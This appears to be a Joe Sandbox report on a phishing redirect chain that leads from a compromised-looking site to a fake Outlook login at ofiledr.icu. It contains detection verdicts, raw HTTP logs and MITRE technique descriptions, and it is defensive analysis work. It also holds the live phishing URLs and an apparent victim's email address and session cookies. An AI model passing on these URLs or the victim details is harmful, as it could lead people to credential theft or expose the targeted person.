00 72 00 61 00 70 00 68 00 79 00 2f 00 66 00 6f 00 6e 00 74 00 73 00 2f 00 54 00 68 00 69 00 73 00 20 00 66 00 6f 00 6e 00 74 00 20 00 73 00 Data Ascii: SegoeUI-SemilightSegoe is a trademark of the Microsoft group of companies.http://www.microsoft.com/typography/fonts/This font s

Target ID:	1
Start time:	09:28:09
Start date:	13/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff7f9810000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	09:28:09
Start date:	13/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1988,i,4837973195230728328,11185042027059048456,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff7f9810000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	09:28:10
Start date:	13/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ=="
Imagebase:	0x7ff7f9810000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: https://www.ofiledr.icu/auth/?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ==	Avira URL Cloud: Label: phishing
Source: https://www.ofiledr.icu/auth?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ==	Avira URL Cloud: Label: phishing
Source: https://www.ofiledr.icu/auth/auth.php	Avira URL Cloud: Label: phishing
Source: https://www.ofiledr.icu/auth/resources/segoeui-regular.ttf	Avira URL Cloud: Label: phishing
Source: https://www.web-api.top/?email=	Avira URL Cloud: Label: phishing
Source: https://www.ofiledr.icu/auth/resources/favicon.ico	Avira URL Cloud: Label: phishing
Source: https://www.ofiledr.icu/auth/resources/segoeui-semilight.ttf	Avira URL Cloud: Label: phishing

Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft Outlook' is well-known and typically associated with the domain 'outlook.com'., The URL 'www.ofiledr.icu' does not match the legitimate domain 'outlook.com'., The domain extension '.icu' is unusual for a well-known brand like Microsoft Outlook., The domain name 'ofiledr' does not resemble 'outlook' and may be a misspelling or an attempt to deceive users., The presence of input fields for 'Email address' and 'Password' is typical for phishing sites attempting to harvest credentials. DOM: 2.1.pages.csv
Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com	Joe Sandbox AI: Score: 9 Reasons: The brand 'Outlook' is well-known and is associated with Microsoft., The legitimate domain for Outlook is 'outlook.com'., The provided URL 'www.ofiledr.icu' does not match the legitimate domain for Outlook., The domain extension '.icu' is unusual for a well-known brand like Outlook., The domain name 'ofiledr' does not resemble 'outlook' and may be a misspelling or unrelated., The presence of input fields for email and password is typical for phishing sites attempting to capture user credentials. DOM: 3.2.pages.csv

Source: Yara match	File source: 2.1.pages.csv, type: HTML
Source: Yara match	File source: 3.2.pages.csv, type: HTML

Source: 0.1.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://opacks.online/#YmpwYXJpc2hAc3RlaW5ib3JuLmN... This script demonstrates several high-risk behaviors, including data exfiltration, redirects to suspicious domains, and the use of obfuscated code. The script decodes a base64-encoded email address from the URL hash and then redirects the user to various external domains, potentially for malicious purposes such as phishing or credential harvesting.
Source: 0.0.id.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3Rl... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of base64 encoding and obfuscation techniques further increases the risk. While the script appears to be validating an email address, the subsequent redirection to various domains, some of which are suspicious, suggests a malicious intent.

Source: Yara match	File source: 2.1.pages.csv, type: HTML
Source: Yara match	File source: 3.2.pages.csv, type: HTML

Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: Number of links: 0
Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: Number of links: 0

Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: Total embedded image size: 23460
Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: Total embedded image size: 23460

Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: Title: Outlook does not match URL
Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: Title: Outlook does not match URL

Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: Form action: auth.php
Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: Form action: auth.php

Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: <input type="password" .../> found
Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: <input type="password" .../> found

Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: No <meta name="author".. found
Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: No <meta name="author".. found

Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: No <meta name="copyright".. found
Source: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com	HTTP Parser: No <meta name="copyright".. found

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.2
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.2
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.2
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: chiltonconsultingllc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.1 HTTP/1.1Host: chiltonconsultingllc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chiltonconsultingllc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: opacks.onlineConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://chiltonconsultingllc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?email=YmpwYXJpc2hAc3RlaW5ib3JuLmNvbQ== HTTP/1.1Host: www.ofiledr.icuConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://opacks.online/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /index.php?csrftoken=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ== HTTP/1.1Host: www.ofiledr.icuConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://opacks.online/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
Source: global traffic	HTTP traffic detected: GET /check.php?tap=p7mBCg9W07nEY2tzReNHAdQeksgfGq8fpkT2ic5rQTwbmLPI4F72lQtlllUBG4fWmoBFzfvss4U0MBVOWWdYCdNaTF0sTXUuEu9T2lovHJzG5JEQkPJicANgAMo08Nkg HTTP/1.1Host: www.ofiledr.icuConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://opacks.online/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
Source: global traffic	HTTP traffic detected: GET /auth/resources/favicon.ico HTTP/1.1Host: www.ofiledr.icuConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
Source: global traffic	HTTP traffic detected: GET /auth/resources/favicon.ico HTTP/1.1Host: www.ofiledr.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
Source: global traffic	HTTP traffic detected: GET /auth?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ== HTTP/1.1Host: www.ofiledr.icuConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
Source: global traffic	HTTP traffic detected: GET /auth/?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ== HTTP/1.1Host: www.ofiledr.icuConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
Source: global traffic	HTTP traffic detected: GET /auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com HTTP/1.1Host: www.ofiledr.icuConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
Source: global traffic	HTTP traffic detected: GET /auth/resources/segoeui-regular.ttf HTTP/1.1Host: www.ofiledr.icuConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.ofiledr.icusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
Source: global traffic	HTTP traffic detected: GET /auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com HTTP/1.1Host: www.ofiledr.icuConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cookieTest=1; logondata=acc=0&lgn=bjparish@steinborn.com; PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5; PrivateComputer=true; PBack=0
Source: global traffic	HTTP traffic detected: GET /auth/resources/segoeui-semilight.ttf HTTP/1.1Host: www.ofiledr.icuConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.ofiledr.icusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cookieTest=1; logondata=acc=0&lgn=bjparish@steinborn.com; PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5; PrivateComputer=true; PBack=0

Source: global traffic	DNS traffic detected: DNS query: chiltonconsultingllc.com
Source: global traffic	DNS traffic detected: DNS query: opacks.online
Source: global traffic	DNS traffic detected: DNS query: www.ofiledr.icu
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ==

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

Windows Analysis Report
https://chiltonconsultingllc.com/#YmpwYXJpc2gkc3RlaW5ib3JuLmNvbQ==